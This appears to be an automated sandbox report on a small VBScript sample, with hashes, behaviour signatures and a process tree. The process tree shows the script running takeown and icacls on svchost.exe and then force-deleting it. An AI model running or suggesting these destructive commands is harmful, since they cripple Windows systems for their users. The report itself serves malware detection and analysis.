Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
05-07-2024 11:24
Static task
static1
Behavioral task
behavioral1
Sample
code.vbs
Resource
win7-20240419-en
windows7-x64
4 signatures
150 seconds
General
-
Target
code.vbs
-
Size
271B
-
MD5
e0f806947d5250e613d90a08aabf53dd
-
SHA1
8aed8a7c0e7cee223a2c1aa926154ade74c23316
-
SHA256
15a06ed5f3fc9efb44cea8c22819b3350ca0a3bf6d81476c5eab5276fa6f1fa9
-
SHA512
71af5e2c1afe5085a69a546ff7893df6c284cc85559220d61da7cb2ea7380138081e327ffe3dfc0f56ff9366e5ec0c96ec5b06e8ef3ff9c92b6135159457f44a
Malware Config
Signatures
-
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 2656 takeown.exe 2672 icacls.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 2656 takeown.exe 2672 icacls.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
WScript.execmd.execmd.exedescription pid process target process PID 3012 wrote to memory of 1268 3012 WScript.exe cmd.exe PID 3012 wrote to memory of 1268 3012 WScript.exe cmd.exe PID 3012 wrote to memory of 1268 3012 WScript.exe cmd.exe PID 3012 wrote to memory of 2780 3012 WScript.exe cmd.exe PID 3012 wrote to memory of 2780 3012 WScript.exe cmd.exe PID 3012 wrote to memory of 2780 3012 WScript.exe cmd.exe PID 3012 wrote to memory of 3032 3012 WScript.exe cmd.exe PID 3012 wrote to memory of 3032 3012 WScript.exe cmd.exe PID 3012 wrote to memory of 3032 3012 WScript.exe cmd.exe PID 1268 wrote to memory of 2656 1268 cmd.exe takeown.exe PID 1268 wrote to memory of 2656 1268 cmd.exe takeown.exe PID 1268 wrote to memory of 2656 1268 cmd.exe takeown.exe PID 2780 wrote to memory of 2672 2780 cmd.exe icacls.exe PID 2780 wrote to memory of 2672 2780 cmd.exe icacls.exe PID 2780 wrote to memory of 2672 2780 cmd.exe icacls.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\code.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown C:\Windows\System32\svchost.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown C:\Windows\System32\svchost.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c icacls C:\Windows\System32\svchost.exe /grant Admin:(F)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\svchost.exe /grant Admin:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del /f /s /q C:\Windows\System32\svchost.exe2⤵